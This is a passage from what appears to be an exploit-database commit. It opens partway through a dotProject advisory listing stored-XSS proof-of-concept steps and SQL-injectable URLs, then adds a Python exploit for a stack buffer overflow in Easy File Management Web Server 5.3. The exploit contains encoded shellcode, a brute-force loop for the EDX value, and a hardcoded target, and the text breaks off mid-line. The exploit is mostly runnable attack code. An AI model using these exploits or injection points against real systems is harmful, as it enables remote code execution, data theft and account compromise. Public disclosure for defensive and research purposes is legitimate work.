'X' is the id of the new event. + +Impact +Any user with the permissions to create new events can expose other +users of dotProject to XSS attacks. + +== Contacts === +The contacts screen fails to filter form details before creating a new +events. + +Proof of Concept +1. Log into dotProject as a user with privileges to create a new contact +2. Select 'Contact' from the '-New Item-' drop down in the upper right +or navigate to index.php?m=contacts&a=addedit +3. Fill in "" for every field +4. Click on the 'submit' button in the lower right +5. Observe the XSS at the View Contact screen +index.php?m=contacts&a=view&contact_id=X where 'X' is the id of the new +contact. + +Impact +Any user with the permissions to create new contacts can expose other +users of dotProject to XSS attacks. + +== Tickets === +The Submit Trouble Ticket screen fails to filter form details before +creating a new ticket. + +Proof of Concept +1. Log into dotProject as a user with privileges to create a new ticket +2. Click the 'Tickets' link in the top navigation bar or navigate to +index.php?m=ticketsmith&a=post_ticket +3. Fill in "" for the 'E-mail' field +4. Click on the 'submit' button in the lower right +5. Observe the XSS at the View Contact screen +index.php?m=ticketsmith&a=view&ticket=X where 'X' is the id of the new +contact. + +Impact +Any user with the permissions to create new tickets can expose other +users of dotProject to XSS attacks. + +== Forums === +The Add Forum screen fails to filter form details before creating a new +forum. + +Proof of Concept +1. Log into dotProject as a user with privileges to create a new forum +2. Click the 'Forums' link in the top navigation bar or navigate to +index.php?m=forums&a=post_ticket +3. Fill in "" for the 'Forum Name' and +'Description' fields +4. Click on the 'submit' button in the lower right +5. Observe the XSS at the Forums screen index.php?m=forums + +Impact +Any user with the permissions to create new tickets can expose other +users of dotProject to XSS attacks. + +== Forum Topics === +The Forum Add Message screen fails to filter form details before +creating a new topic. + +Proof of Concept +1. Log into dotProject as a user with privileges to create a new forum +topic +2. Click the 'Forums' link in the top navigation bar or navigate to +index.php?m=forums +3. Click on the name of a forum +4. Click on the 'start a new topic' button in the upper right +5. Fill in "" for the 'Subject' and +'Message' fields +4. Click on the 'submit' button in the lower right +5. Observe the XSS at the Forums topics screen or +index.php?m=forums&a=viewer&forum_id=2&message_id=X where 'X' is the id +of the topic + +Impact +Any user with the permissions to create new tickets can expose other +users of dotProject to XSS attacks. + + + +SQL Injection Vulnerabilities +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +SQL injection vulnerabilities could allow an attacker to expose +sensitive data, such as password hashes, alter the database contents to +introduce stored XSS vulnerabilities, reset administrative user +passwords to allow escalation of privilege and other attacks that could +lead to the compromise of data, user account credentials, or even the +web server. + +The following URL's expose PHP functions that are vulnerable to SQL +injection: + + +index.php?m=departments&a=addedit&company_id=1' +index.php?m=ticketsmith&a=view&ticket=1' +index.php?m=files&a=index&tab=4&folder=1' + +Additionally some forms allow for SQL injection: + +* The ticket creation form index.php?m=ticketsmith&a=post_ticket does +not properly sanitize single quotes in the Name or Email fields diff --git a/platforms/windows/remote/33453.py b/platforms/windows/remote/33453.py new file mode 100755 index 000000000..b31aee2a3 --- /dev/null +++ b/platforms/windows/remote/33453.py @@ -0,0 +1,90 @@ +#!/usr/bin/env python + +# Exploit Title: Easy File Management Web Server 5.3 stack buffer overflow +# Date: 19 May 2014 +# Exploit Author: superkojiman - http://www.techorganic.com +# Vendor Homepage: http://www.efssoft.com +# Software Link: http://www.web-file-management.com/download.php +# Version: 5.3 +# Tested on: English version of Windows XP Professional SP2 and SP3 +# +# Description: +# By setting UserID in the cookie to a long string, we can overwrite EDX which +# allows us to control execution flow when the following instruction is +# executed: +# +# 0x00468702: call dword ptr [edx+28h] +# +# Very similar to Easy File Sharing Web Server 6.8 exploit here: +# http://www.exploit-db.com/exploits/33352/ +# I suspect their other web server solutions might be vulnerable to a similar +# overflow. +# +# Tested with Easy File Management Web Server installed in the default location +# at C:\EFS Software\Easy File Management Web Server + + +import socket +import struct +import sys + +target = "172.16.229.134" +port = 80 + +# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/ +# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin +# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1) +shellcode = ( +"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + +"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + +"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + +"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + +"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + +"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + +"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + +"\x1c\x39\xbd" +) + +for i in xrange(1,255): + n = "" + if i < 16: + n = "0" + hex(i)[-1] + else: + n = hex(i)[2:] + + # craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28] + # only second byte changes in the stack address changes, so we can brute + # force it + guess = "0x01" + n + "9898" + print "trying", guess + + payload = "A"*20 # padding + payload += struct.pack("